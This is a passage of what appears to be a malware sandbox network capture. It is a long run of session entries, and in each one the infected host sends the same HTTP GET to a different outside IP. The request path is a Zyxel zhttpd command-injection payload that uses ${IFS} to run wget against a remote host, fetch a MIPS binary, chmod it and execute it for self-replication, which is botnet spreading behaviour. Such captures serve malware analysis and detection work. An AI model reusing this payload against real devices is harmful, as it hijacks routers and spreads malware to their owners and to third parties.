                                                Jan 28, 2024 10:16:16.676912069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2111192.168.2.2353744212.84.84.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.676942110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2112192.168.2.2351664114.187.179.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.676980019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2113192.168.2.234005850.142.231.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677017927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2114192.168.2.2355100181.27.44.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677063942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2115192.168.2.2335238184.222.225.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677078009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2116192.168.2.2334826173.141.208.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677118063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2117192.168.2.2335980156.105.243.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677136898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2118192.168.2.2344502101.230.31.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677172899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2119192.168.2.233712831.14.170.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677174091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2120192.168.2.2349556195.18.19.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677232981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2121192.168.2.2342242194.202.74.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677251101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2122192.168.2.2334160171.225.243.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677279949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2123192.168.2.2358108125.164.157.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677297115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2124192.168.2.234446857.10.240.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677330017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2125192.168.2.2358234170.182.65.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677364111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2126192.168.2.2343538155.92.244.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677364111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2127192.168.2.2333886153.25.60.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677402020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2128192.168.2.2342844164.143.128.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677433968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2129192.168.2.2345232187.194.87.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677476883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2130192.168.2.235800848.90.62.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677509069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2131192.168.2.2341032155.114.64.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677511930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2132192.168.2.2351330147.109.71.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677572012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2133192.168.2.2352126125.0.163.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677603960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2134192.168.2.235943871.110.251.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677627087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2135192.168.2.234120239.127.93.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677680969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2136192.168.2.235527081.1.20.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677715063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2137192.168.2.23448049.41.174.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677732944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2138192.168.2.233948032.72.160.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677752972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2139192.168.2.233615025.250.54.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677819014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2140192.168.2.2345044193.15.79.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677844048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2141192.168.2.236090451.233.20.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677860975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2142192.168.2.233942691.9.107.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677912951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2143192.168.2.235646478.110.137.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677912951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2144192.168.2.2358106136.134.87.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677963972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2145192.168.2.2358336135.139.225.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677984953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2146192.168.2.235611827.170.250.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.677999020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2147192.168.2.235907054.1.119.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678039074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2148192.168.2.234238883.71.215.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678061962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2149192.168.2.2345484113.249.154.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678111076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2150192.168.2.2334150133.90.213.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678124905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2151192.168.2.233962454.56.204.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678147078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2152192.168.2.2346316178.231.121.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678170919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2153192.168.2.233775039.43.16.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678208113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2154192.168.2.2348558187.240.159.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678244114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2155192.168.2.234422278.80.34.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678287029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2156192.168.2.2357294153.30.220.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678308010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2157192.168.2.2359494129.184.127.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678349018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2158192.168.2.234836037.142.243.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678364992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2159192.168.2.2352154210.116.59.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678383112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2160192.168.2.2342528210.34.47.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678412914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2161192.168.2.234080846.221.51.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678438902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2162192.168.2.2353860147.88.243.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678467989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2163192.168.2.235270813.114.171.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678492069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2164192.168.2.2334578143.240.40.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678519011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2165192.168.2.2333138146.117.210.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678519011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2166192.168.2.2352244197.106.172.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678555012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2167192.168.2.2359510153.164.37.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678589106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2168192.168.2.2347434138.50.129.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678620100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2169192.168.2.2355276196.90.253.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678622961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2170192.168.2.2359076178.208.22.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678651094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2171192.168.2.236048063.176.97.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.678714991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2172192.168.2.2343406170.57.152.156443
                                                TimestampBytes transferredDirectionData
